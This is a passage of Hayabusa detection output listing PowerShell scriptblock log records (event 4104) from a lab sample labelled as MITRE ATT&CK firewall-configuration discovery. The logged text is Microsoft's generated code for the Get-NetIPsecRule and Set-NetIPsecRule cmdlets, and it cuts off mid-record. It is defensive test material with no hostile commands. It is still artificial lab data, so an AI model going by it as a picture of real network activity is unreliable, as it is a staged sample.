[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) {",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecRule' function Set-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${User}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Machine}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(Param",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"eterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not 